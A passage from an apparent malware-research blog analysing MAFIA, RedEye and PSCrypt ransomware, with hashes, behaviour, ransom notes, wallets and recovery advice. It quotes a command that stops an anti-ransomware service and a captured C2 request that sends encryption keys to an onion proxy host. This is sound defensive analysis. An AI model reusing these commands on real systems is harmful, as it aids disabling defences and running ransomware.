</li>
<li><b>VirusTotal report</b>:<br /><a href="https://www.virustotal.com/en/file/d6dee35981698416804548185f09af9c27987a0423e35bffd5b543c50fb9b5e3/analysis/" target="_blank">d6dee35981698416804548185f09af9c27987a0423e35bffd5b543c50fb9b5e3</a></li>
</ul>
<div>
First, MAFIA will attempt to stop a service named "AppCheck" by launching the following command (which will use an elevated CMD prompt):</div>
<div>
<br /></div>
<blockquote class="tr_bq">
<i>sc stop AppCheck</i></blockquote>
<br />
Ransomware usually stops database processes, for it to be able to also encrypt database-files which may be in use by said processes. However, in this case, <i>AppCheck</i> is actually a service which belongs to an anti-ransomware product from South-Korea. Figure 1 shows a screenshot of its website.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-AiWE1g5TiA0/W3BIBmONyDI/AAAAAAAACGg/7Dq_OnbwRocXx65IWAzRPzgBt0dofbzrwCLcBGAs/s1600/appcheck.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="447" data-original-width="1039" height="171" src="https://2.bp.blogspot.com/-AiWE1g5TiA0/W3BIBmONyDI/AAAAAAAACGg/7Dq_OnbwRocXx65IWAzRPzgBt0dofbzrwCLcBGAs/s400/appcheck.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - "100% Signatureless Anti-Ransomware" - <a href="https://www.checkmal.com/?lang=en">https://www.checkmal.com/?lang=en</a></td></tr>
</tbody></table>
<br />
As for the effectiveness of this software: no idea, but the author deemed it important enough to include it, so either it has proven it works, or it is used by a lot of users and businesses.<br />
<br />
The author of the MAFIA ransomware has also left a debug path, which mentions the name "Jinwoo" (<span style="font-family: inherit;">"진우" </span>in Korean), and may be an indicator of the developer's nationality.<br />
<br />
MAFIA makes use of OpenSSL to encrypt files, which it does with AES-256 in CBC mode. As mentioned earlier, encrypted files will obtain the ".MAFIA" extension. For example; Penguins.jpg becomes <b>Penguins.jpg.MAFIA</b>.<br />
<br />
Files with the following extensions (300 in total) will be encrypted:<br />
<br />
<blockquote class="tr_bq">
<i>.3dm, .3ds, .3fr, .3g2, .3gp, .3pr, .ab4, .accdb, .accde, .accdr, .accdt, .ach, .acr, .act, .adb, .ads, .agdl, .ait, .apj, .arw, .asf, .asm, .asp, .asx, .avi, .back, .backup, .backupdb, .bak, .bank, .bay, .bdb, .bgt, .bik, .bkp, .bkp, .blend, .bpw, .cdf, .cdr, .cdr3, .cdr4, .cdr5, .cdr6, .cdrw, .cdx, .ce1, .ce2, .cer, .cfp, .cgm, .cib, .class, .cls, .cmt, .cpi, .cpp, .cr2, .craw, .crt, .crw, .csh, .csl, .csv, .dac, .db-journal, .db3.dbf, .dc2, .dcr, .dcs, .ddd, .ddoc, .ddrw, .dds, .der, .des, .design, .dgc, .djvu, .dng, .doc, .docm, .docx, .dot, .dotm, .dotx, .drf, .drw, .dtd, .dwg, .dxb, .dxf, .dxg, .eml, .eps, .erbsql, .erf, .exf, .fdb, .ffd, .fff, .fhd, .fla, .flac, .flv, .fpx, .fxg, .gray, .grey, .gry, .hbk, .hpp, .ibank, .ibd, .ibz, .idx, .iif, .iiq, .incpas, .indd, .java, .jpe, .jpeg, .jpg, .kc2, .kdbx, .kdc, .key, .kpdx, .lua, .m4v, .max, .mdb, .mdc, .mdf, .mef, .mmw, .moneywell, .mos, .mov, .mp3, .mp4, .mpg, .mrw, .msg, .myd, .ndd, .nef, .nk2, .nop, .nrw, .ns2, .ns3, .ns4, .nsd, .nsf, .nsg, .nsh, .nwb, .nx2, .nx1, .nyf, .oab, .obj, .odb, .odc, .odf, .odg, .odm, .odp, .ods, .odt, .oil, .orf, .ost, .otg, .oth, .otp, .ots, .ott, .p12, .p7b, .p7c, .pab, .pages, .pas, .pat, .pcd, .pct, .pdb, .pdd, .pdf, .pef, .pem, .pfx, .php, .plc, .pot, .potm, .potx, .ppam, .pps, .ppsm, .ppsx, .ppt, .pptm, .pptx, .prf, .psafe3, .psd, .pspimage, .pst, .ptx, .qba, .qbb, .qbm, .qbr, .qbw, .qbx, .qby, .r3d, .raf, .rar, .rat, .raw, .rdb, .rtf, .rw2, .rw1, .rwz, .s3db, .sas7bdat, .say, .sd0, .sda, .sdf, .sldm, .sldx, sqlite, .sqlite3, .sqlitedb, .srf, .srt, .srw, .st4, .st5, .st6, .st7, .st8, .stc, .std, .sti, .stw, .stx, .svg, .swf, .sxc, .sxd, .sxg, .sxi, .sxm, .sxw, .tex, .tga, .thm, .tlg, .txt, .vob, .wallet, .wav, .wb2, .wmv, .wpd, .wps, .xll, .x3f, .xis, .xla, .xlam, .xlk, .xlm, .xlr, .xls, .xlsb, .xlsm, .xlsx, .xlt, .xltm, .xltx, .xlw, .ycbcra, .yuv, .zip, .alz, .jar, .png, .bmp, .a00, .gif, .egg</i></blockquote>
<br />
Note: because the MAFIA ransomware uses OpenSSL for encryption, the process is slow, and the user may be able to interrupt it by killing the process (typically named <i>winlog<b>i</b>n.exe</i>), or by shutting down the machine.<br />
<br />
Figure 2 shows a side-by-side visual representation of the original (left) and encrypted image (right).<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-l6R572aL6zQ/W3BKe-hW6BI/AAAAAAAACGs/rnVUNZFOobMlsnZFvncvVRSGgXZc0tmlQCLcBGAs/s1600/viz.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="992" height="400" src="https://1.bp.blogspot.com/-l6R572aL6zQ/W3BKe-hW6BI/AAAAAAAACGs/rnVUNZFOobMlsnZFvncvVRSGgXZc0tmlQCLcBGAs/s400/viz.png" width="247" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Comparison (the blue represents ASCII strings)</td></tr>
</tbody></table>
<br />
MAFIA will also create a ransom note in HTML named "Information" in the same location as the original dropper. Ironically enough, the ransom note will also have the ".mafia" extension appended - the file will not be encrypted however.<br />
<br />
Figure 3 shows the ransom note, in a browser.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN64LAgVnHWRQ-K30EPfSTKjjFkCtfU1PzqLZW_ktwzXyuoCQC0yzJF_2MinUv-eb-aqz6A36dvBJXjINXE9ryKjGmAPcegAMX7kMJ68cLYBJOZq1iw1Yy0T2dKQySjN48Z0V0GU61jVoH/s1600/note.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="256" data-original-width="768" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN64LAgVnHWRQ-K30EPfSTKjjFkCtfU1PzqLZW_ktwzXyuoCQC0yzJF_2MinUv-eb-aqz6A36dvBJXjINXE9ryKjGmAPcegAMX7kMJ68cLYBJOZq1iw1Yy0T2dKQySjN48Z0V0GU61jVoH/s400/note.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - Ransom note</td></tr>
</tbody></table>
<br />
The text translates from Korean ("고유넘버") as "Unique number", and appears to contain two unique identifiers.<br />
<br />
As mentioned earlier, MAFIA will use a Tor proxy for C2 communication; an example request is as follows:<br />
<br />
<blockquote class="tr_bq">
<i>GET /mafiaEgnima.php?iv=0x9e0x4b0x410x5c0x480x3a0xf40x90x2f0xfa0x960xb90x9b0x830xd40xb7&key=0xb90x1e0x600x3d0xef0x6c0xe60x930x6d0xab0x420x7b0x50x350xf00xcd0x3c0x490xc30x5f0xa10xe0xda0x270x5d0xd50xd10xa40xc0x9f0x340x79&seq=cbdf395c9281ae2ec52a306b5c29ec5 HTTP/1.1<br />Host: wibkilmskir4rlxz.onion.pet<br />Connection: keep-alive<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36</i></blockquote>
<br />
It appears the ransomware tries to send out an encryption key and IV using an HTTP GET request, which could make it possible to decrypt files, granted the network traffic is inspected at that point.<br />
<br />
There's several other binaries of MAFIA out there, such as:<br />
<br />
<blockquote class="tr_bq">
<i>f4b25591ae53504ef5923344a9f03563<br />da23c8a7be5d83ae3e6b7b3291fdb880<br />0776e348313c7680db86ed924cff10b8<br />6487edd9b1e7cf6be4a9b1ac57424548<br />119228fb8f4333b1c10ff03543c6c0ea</i></blockquote>
<div>
<br /></div>
<div>
Three of these (<i>119228fb8f4333b1c10ff03543c6c0ea, </i><i>0776e348313c7680db86ed924cff10b8 and </i><i>6487edd9b1e7cf6be4a9b1ac57424548</i>) have a different C2 server, specifically:</div>
<div>
<b>wibkilmskir4rlxz.onion[.]plus</b>.</div>
<div>
<i><br /></i></div>
<div>
Neither of these servers appeared to be online at time of writing.</div>
<div>
<br /></div>
<div>
Decryption is possible thanks to Michael Gillespie (<a href="https://twitter.com/demonslay335" target="_blank">@demonslay335</a>).<br />
<br />
Download the decrypter from:<br />
<a href="https://download.bleepingcomputer.com/demonslay335/MAFIADecrypter.zip">https://download.bleepingcomputer.com/demonslay335/MAFIADecrypter.zip</a><br />
<br />
In case of questions or feedback, be sure to leave a comment.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>Indicators</b></div>
<div>
<b><br /></b></div>
<script src="https://otx.alienvault.com/pulse/5b70534f319dba7ddcdaab8f.js"></script>
<br />
<div>
<b><br /></b></div>
<br />Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com1tag:blogger.com,1999:blog-606282676955748155.post-55488382946211655882018-06-07T00:30:00.000+02:002018-06-07T00:37:38.096+02:00RedEye ransomware: there's more than meets the eye<br />
<br />
A rather anonymous account reached out to me on Twitter asking to check out a "scary & really nasty" sample.<br />
<br />
It turned out to be RedEye ransomware, a new strain or variant by the same creator of <a href="https://twitter.com/bartblaze/status/965696929043812352" target="_blank">Annabelle ransomware</a>, which I discovered in February earlier this year.<br />
<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<br />
This ransomware is named "<b>RedEye</b>" by the author "<b>iCoreX</b>".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-Qf6RNLgc8VI/Wxhbej0HsrI/AAAAAAAACFg/6grtwbvXaskYrMKCH1sZWU46ifXiUvA9ACLcBGAs/s1600/ico.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="256" data-original-width="256" height="200" src="https://4.bp.blogspot.com/-Qf6RNLgc8VI/Wxhbej0HsrI/AAAAAAAACFg/6grtwbvXaskYrMKCH1sZWU46ifXiUvA9ACLcBGAs/s200/ico.png" width="200" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Properties:<br />
<ul>
<li><b>MD5</b>: 832090ba6fe32a3c7c36dbd76f270215</li>
<li><b>SHA1</b>: 804b8e85f38de8b82a961401836ccec5880342e6</li>
<li><b>SHA256</b>: 1a8b7a6547b743ea01bb0ac057c91228c10dc8f99562ce2b06e25893161776bb</li>
<li><b>Compilation timestamp</b>: 2018-05-03 10:04:35</li>
<li><b>VirusTotal report</b>:<br /><a href="https://www.virustotal.com/en/file/1a8b7a6547b743ea01bb0ac057c91228c10dc8f99562ce2b06e25893161776bb/analysis/" target="_blank">1a8b7a6547b743ea01bb0ac057c91228c10dc8f99562ce2b06e25893161776bb</a></li>
</ul>
<div>
<br /></div>
<div>
The first noticeable thing about this file is the huge filesize: 35.0 MB (36657152 bytes). This is due to several media files, specifically images and audio files, embedded in the binary.</div>
<div>
<br /></div>
<div>
It contains three ".wav" files:</div>
<div>
<ul>
<li><i>child.wav</i></li>
<li><i>redeye.wav</i></li>
<li><i>suicide.wav</i></li>
</ul>
<div>
All three audio files play a "creepy" sound, intended to scare the user. </div>
</div>
<div>
<br /></div>
<div>
Additionally, the binary is protected with ConfuserEx, compression, and a few other tricks. It also embeds another binary, which is responsible for replacing the MBR, which has the following properties:</div>
<div>
<br /></div>
<div>
<ul>
<li><b>MD5</b>: 878a10cda09fec2cb823f2b7138b550e</li>
<li><b>SHA1</b>: db44dae60c12853cdbe62ec9f7b3493a897e519a</li>
<li><b>SHA256</b>: f96ed49ab1a5b4e2333fee30c42b2ae28dc5bc74fa02b9c6989e5c0159cfffd7</li>
<li><b>Compilation timestamp </b>(<i>Delphi</i>): 1992-06-19 22:22:17</li>
<li><b>Compilation timestamp </b>(<i>Actual</i>): 2018-06-04 14:23:36</li>
<li><b>VirusTotal report</b>:<br /><a href="https://www.virustotal.com/en/file/f96ed49ab1a5b4e2333fee30c42b2ae28dc5bc74fa02b9c6989e5c0159cfffd7/analysis/1528323468/" target="_blank">f96ed49ab1a5b4e2333fee30c42b2ae28dc5bc74fa02b9c6989e5c0159cfffd7</a></li>
</ul>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
What actually happens when executing this ransomware? Just like <a href="https://www.bleepingcomputer.com/news/security/the-annabelle-ransomware-is-a-horrific-mess/" target="_blank">Annabelle</a> ransomware it will perform a set of actions to make removal quite difficult, for example; it will disable task manager and in this iteration, will also hide your drives.</div>
<div>
<br /></div>
<div>
Similar to before, a ransom message is then displayed as follows:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-Y3XcM4XWL1o/WxhXu5jnKTI/AAAAAAAACFM/iX7nuANM9IIgB5yUlJ5oNI-BCj97L2fiQCLcBGAs/s1600/Capture.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="869" data-original-width="1600" height="216" src="https://1.bp.blogspot.com/-Y3XcM4XWL1o/WxhXu5jnKTI/AAAAAAAACFM/iX7nuANM9IIgB5yUlJ5oNI-BCj97L2fiQCLcBGAs/s400/Capture.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - RedEye Ransomware</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The message reads:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<blockquote class="tr_bq" style="clear: both;">
<i>All your personal files has been encrypted with an very strong key by RedEye!<br />(Rijndael-Algorithmus - AES - 256 Bit)<br />The only way to get your files back is:<br />- Go to http://redeye85x9tbxiyki.onion/tbxIyki - Enter your Personal ID<br />and pay 0.1 Bitcoins to the adress below! After that you need to click on<br /> "Check Payment". Then you will get a special key to unlock your computer.<br />You got 4 days to pay, when the time is up,<br />then your PC will be fully destroyed!</i></blockquote>
<div class="separator" style="clear: both; text-align: left;">
<i><br /></i></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The ransomware has several options which I won't be showing here, but in short, it can:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li><i>Show encrypted files</i></li>
<li><i>Decrypt files</i></li>
<li><i>Support</i></li>
<li><i>Destroy PC</i></li>
</ul>
<br />
<div class="" style="clear: both; text-align: left;">
The Destroy PC option shows a GIF as background where you have the option to select "Do it" and "Close". I won't display the image however.</div>
<div class="" style="clear: both; text-align: left;">
<br /></div>
<div class="" style="clear: both; text-align: left;">
RedEye claims to encrypt files securely with AES256. On my machine, it appears to overwrite or fill files with 0 bytes, rendering the files useless, and appending the "<b>.RedEye</b>" extension.</div>
<div class="" style="clear: both; text-align: left;">
<br /></div>
<div class="" style="clear: both; text-align: left;">
The machine will, when the time runs out or when the "Do it" option is selected, reboot and replace the MBR, again similar to Annabelle ransomware, with the following message:</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-pUV0vgsmw7M/WxhXu0A-izI/AAAAAAAACFE/OnoyIHPZ4FgYyyqk_NvddCSywptTxAooQCLcBGAs/s1600/mr.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="420" data-original-width="1253" height="133" src="https://3.bp.blogspot.com/-pUV0vgsmw7M/WxhXu0A-izI/AAAAAAAACFE/OnoyIHPZ4FgYyyqk_NvddCSywptTxAooQCLcBGAs/s400/mr.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - MBR lock screen</td></tr>
</tbody></table>
<br />
The message reads as follows:<br />
<br />
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
<i>RedEye Terminated your computer!</i> </blockquote>
<blockquote class="tr_bq">
<i>The reason for that could be:<br />- The time has expired<br />- You clicked on the 'Destroy PC' button</i> </blockquote>
<blockquote class="tr_bq">
<i>There is no way to fix your PC! Have Fun to try it :)</i></blockquote>
<blockquote class="tr_bq">
<i>My YouTube Channel: iCoreX <- :p="" br="" subscribe=""></-></i><i>Add me on discord!</i><i>iCoreX#3333 <- account="" amp="" annabelle="" by="" creator="" discord.="" discord="" got="" i="" icorex="" jigsaw="" my="" named="" of="" old="" ransomware="" redeye="" terminated=""></-></i></blockquote>
<br />
<br />
The author, iCoreX, claims to have created Jigsaw, Annabelle, and now the RedEye ransomware - whether the former is true or not, I'll leave in the middle.<br />
<br />
Details on the ransomware:<br />
<br />
<b>Extension</b>: .RedEye<br />
<b>BTC Wallet</b>: 1JSHVxXnGDydVXVamFW9AEmk3vk8cF8Vuj<br />
<b>Payment portal</b>:<b> </b>(currently offline): http://redeye85x9tbxiyki[.]onion<br />
<br />
<div>
Currently, it doesn't appear any payments have been made as of yet:</div>
<div>
<a href="https://blockchain.info/address/1JSHVxXnGDydVXVamFW9AEmk3vk8cF8Vuj">https://blockchain.info/address/1JSHVxXnGDydVXVamFW9AEmk3vk8cF8Vuj</a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-size: large;"><b>Removal</b></span></div>
<div>
<br /></div>
<div>
You <i>may</i> be able to restore the MBR, or your files, if you catch the ransomware in the act, and shutdown the machine at that point. <a href="https://www.howtogeek.com/107511/how-to-boot-into-safe-mode-on-windows-8-the-easy-way/" target="_blank">Reboot in safe mode</a> and copy over or <a href="https://www.howtogeek.com/242428/whats-the-best-way-to-back-up-my-computer/" target="_blank">back-up</a> your files.<br />
<br />
If tools such as the registry editor are not working, run <a href="https://www.bleepingcomputer.com/download/rkill/" target="_blank">Rkill</a> in safe mode first.<br />
<br />
Then, <a href="https://www.howtogeek.com/howto/32523/how-to-manually-repair-windows-7-boot-loader-problems/" target="_blank">Restore the MBR</a>, and <a href="https://www.howtogeek.com/133254/beginner-geek-how-to-reinstall-windows-on-your-computer/" target="_blank">reinstall Windows</a>.<br />
<br />
You may also try to restore the MBR <i>first</i>, and consequently attempt to restore files using Shadow Volume Copies. For example, a tool such as <a href="http://www.shadowexplorer.com/" target="_blank">Shadow Explorer</a> can be of assistance, or read the tutorial <a href="https://www.bleepingcomputer.com/tutorials/how-to-recover-files-and-folders-using-shadow-volume-copies/" target="_blank">here</a>.<br />
<br />
If that doesn't work either, you may try using a data recovery program such as <a href="http://www.cgsecurity.org/wiki/PhotoRec" target="_blank">PhotoRec</a> or <a href="https://www.piriform.com/recuva" target="_blank">Recuva</a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-size: large;"><b>Conclusion</b></span></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
While it appears that the RedEye ransomware has even more tricks up its sleeve than its predecessor Annabelle, the same conclusion holds true: do <b>not </b>pay the ransomware.</div>
<div>
<br /></div>
<div>
As for the actual purpose of the ransomware: it may be considered a ransomware of the wiper kind, however, it appears the author likes to showcase his or her skill.</div>
<div>
<br /></div>
<div>
You can read more on the purpose of ransomware <a href="https://bartblaze.blogspot.com/p/the-purpose-of-ransomware.html" target="_blank">here</a>.</div>
<div>
<br /></div>
<div>
<br />
<br />
<b>IOCs</b><br />
<br /></div>
<script src="https://otx.alienvault.com/pulse/5b1861d1f5cfbf1ff96ac5ab.js"></script>Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com4tag:blogger.com,1999:blog-606282676955748155.post-25140597736056885502018-05-07T13:45:00.002+02:002018-05-08T23:16:39.392+02:00PSCrypt ransomware: back in business<br />
PSCrypt is ransomware first discovered last year, in 2017, targeting users and organisations alike in Ukraine, and the malware itself is based on GlobeImposter ("GI") ransomware.<br />
<br />
I've written about PSCrypt in the past, when it was distributed via Crystal Finance Millenium's hacked website: <a href="https://bartblaze.blogspot.co.uk/2017/08/crystal-finance-millennium-used-to.html" target="_blank">Crystal Finance Millennium used to spread malware</a><br />
<br />
In this quick blog post, we'll take a look at the latest iteration of PSCrypt.<br />
<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<br />
A file named "xls.scr", which sports a fancy "energy" or "power" icon is responsible for loading PSCrypt on the machine, and was spread via a phishing campaign.<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-Srpd-y5aHXc/WvAzhsFlLII/AAAAAAAACD0/Bc7DyZ7D8q0UPpMY4mUTvQ-9IWbrXzL_QCLcBGAs/s1600/ico.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="72" data-original-width="72" src="https://2.bp.blogspot.com/-Srpd-y5aHXc/WvAzhsFlLII/AAAAAAAACD0/Bc7DyZ7D8q0UPpMY4mUTvQ-9IWbrXzL_QCLcBGAs/s1600/ico.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Icon</td></tr>
</tbody></table>
<br />
The ransomware has the following properties:<br />
<br />
<ul>
<li><b>MD5</b>: aec5498f95a19ac143534283592544b4</li>
<li><b>SHA1</b>: 351d043a0955714031d1989e00d9fe3b84eaa823</li>
<li><b>SHA256</b>: 43584bfb791047af592c883b8707289137082f024a851b082762d3100f1f0941</li>
<li><b>Compilation timestamp</b>: 2018-04-24 00:15:26</li>
<li><b>VirusTotal report</b>:<br /><a href="https://www.virustotal.com/en/file/43584bfb791047af592c883b8707289137082f024a851b082762d3100f1f0941/analysis/" target="_blank">43584bfb791047af592c883b8707289137082f024a851b082762d3100f1f0941</a></li>
</ul>
<br />
As mentioned earlier, PSCrypt is based on GlobeImposter and as such, has very similar functionality.<br />
<br />
The following folders are excluded from being encrypted:<br />
<br />
<blockquote class="tr_bq">
<i>Avast, Avira, COMODO, Chrome, Common Files, Dr.Web, ESET, Internet Explorer, Kaspersky Lab, McAfee, Microsoft, Microsoft Help, Microsoft Shared, Microsoft.NET, Movie Maker, Mozilla Firefox, NVIDIA Corporation, Opera, Outlook Express, ProgramData, Symantec, Symantec_Client_Security, Windows, Windows App Certification Kit, Windows Defender, Windows Kits, Windows Mail, Windows Media Player, Windows Multimedia Platform, Windows NT, Windows Phone Kits, Windows Phone Silverlight Kits, Windows Photo Viewer, Windows Portable Devices, Windows Sidebar, WindowsPowerShell, Wsus, YandexBrowser, ntldr, spytech software, sysconfig, system volume information</i></blockquote>
<br />
This iteration of PSCrypt will encrypt <b>all </b>files, including executables, <i>except </i>those files with the following extensions:<br />
<br />
<blockquote class="tr_bq">
<i>.$er,.4db,.4dd,.4d,.4mp,.abs,.abx,.accdb,.accdc</i></blockquote>
<br />
As usual, a temporary batch file will be used to clear Volume Shadow Copies as well as Event Logs:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-vgoS_8jFV90/WvA1GCA_SUI/AAAAAAAACEA/TNphLhlXa4E4YRrIeqLpJBqPa3LVEAgzQCLcBGAs/s1600/vss.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="262" data-original-width="1187" height="87" src="https://3.bp.blogspot.com/-vgoS_8jFV90/WvA1GCA_SUI/AAAAAAAACEA/TNphLhlXa4E4YRrIeqLpJBqPa3LVEAgzQCLcBGAs/s400/vss.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Batch file</td></tr>
</tbody></table>
<br />
What's new in this iteration of PSCrypt is not only the changes implemented by/via GlobeImposter ransomware, but also the ransom note itself, as noted in Figure 3 and 4 below:<br />
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-TLVThZQ-2qU/WvA28mTwoGI/AAAAAAAACEQ/INdjR_AkaREvHpWms2Di4Z8bN2vQAuJxACLcBGAs/s1600/note-p1.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="858" data-original-width="899" height="381" src="https://4.bp.blogspot.com/-TLVThZQ-2qU/WvA28mTwoGI/AAAAAAAACEQ/INdjR_AkaREvHpWms2Di4Z8bN2vQAuJxACLcBGAs/s400/note-p1.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - Ransomware note, part 1</td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-TU9XuZd794c/WvA28vCGN4I/AAAAAAAACEM/UBsjfuvSxgsnPjdrAPIiMyARrt8PwxHIQCLcBGAs/s1600/note-p2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="907" data-original-width="827" height="400" src="https://2.bp.blogspot.com/-TU9XuZd794c/WvA28vCGN4I/AAAAAAAACEM/UBsjfuvSxgsnPjdrAPIiMyARrt8PwxHIQCLcBGAs/s400/note-p2.PNG" width="363" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - Ransomware note, part 2</td></tr>
</tbody></table>
<br />
The title of the ransom note is "Ваші файли тимчасово зашифрувати! Не хвилюйтесь!", which translates to "Your files are temporarily encrypted! Do not worry!".<br />
<div>
<br />
<div>
<br /></div>
<div>
The Ukrainian version is rather lenghty, and is as follows:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>☠ ВАШІ ФАЙЛИ ТИМЧАСОВО НЕДОСТУПНІ.☠<br />ВАШІ ДАНІ БУЛИ ЗАШІВРОВАННИ!<br />Для відновлення даних потрібно дешифратор.<br />Щоб отримати дешифратор, ви повинні, оплатити послуги розшифровки:<br />Оплата відбувається за коштами біткойн на кошелек № 1EoWxYTt7xCskTxjm47E2XNxgkZv1anDP9<br />Вартість послуги складає 150$<br />Оплату можна провести в терміналі IBox. або виберіть один з обмінних сайтів на сторінці - https://www.bestchange.ru/privat24-uah-to-bitcoin.html (приклад обмін Приват24 на BTC) також можете скористатися послугами https://e-btc.com.ua<br />Додаткова інформація:<br />Програма можемо дешифрувати один файл як доказ того, що у неї є декодер. Для цього необхідно надіслати зашифрований файл - вагою не більше 2 mb, и ваш уникальный идентификационный код, на пошту: systems32x@gmail.com<br />Более детальная инструкция по оплате: https://btcu.biz/main/how_to/buy<br />Увага!<br />Всі файли розшифровуються тільки після 100% оплати<br />Ви дійсно отримуєте дешифратор після оплати<br />Не намагайтеся видалити програму або запустити антивірусні інструменти це може ускладнити вам роботу<br />Спроби самодешіфрованія файлів приведуть до втрати ваших даних<br />Декодери інших користувачів не сумісні з вашими даними, оскільки унікальний ключ шифрування кожного користувача.<br />За запитом користувачів, надаємо контакти клієнтів, які вже користувалися послугами нашого сервісу.<br />ОБОВ'ЯЗКОВО ЗАПИШІТЬ РЕЗЕРВНІ КОНТАКТИ ДЛЯ ЗВ'ЯЗКУ:<br />systems32x@gmail.com - основний<br />systems32x@yahoo.com - резервний<br />Додаткові контакти:<br />systems32x@tutanota.com - (якщо відповіді не прийшло після 24-х годин)<br />help32xme@usa.com - (якщо відповіді не прийшло після 24-х годин)<br />Additional.mail@mail.com - (якщо відповіді не прийшло після 24-х годин)<br />З повагою<br />Unlock files LLC<br />33530 1st Way South Ste. 102<br />Federal Way, WA 98003<br />United States</i></blockquote>
<div>
<i><br /></i></div>
<div>
Google Translation, so pretty loose - I've made some minor corrections however:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
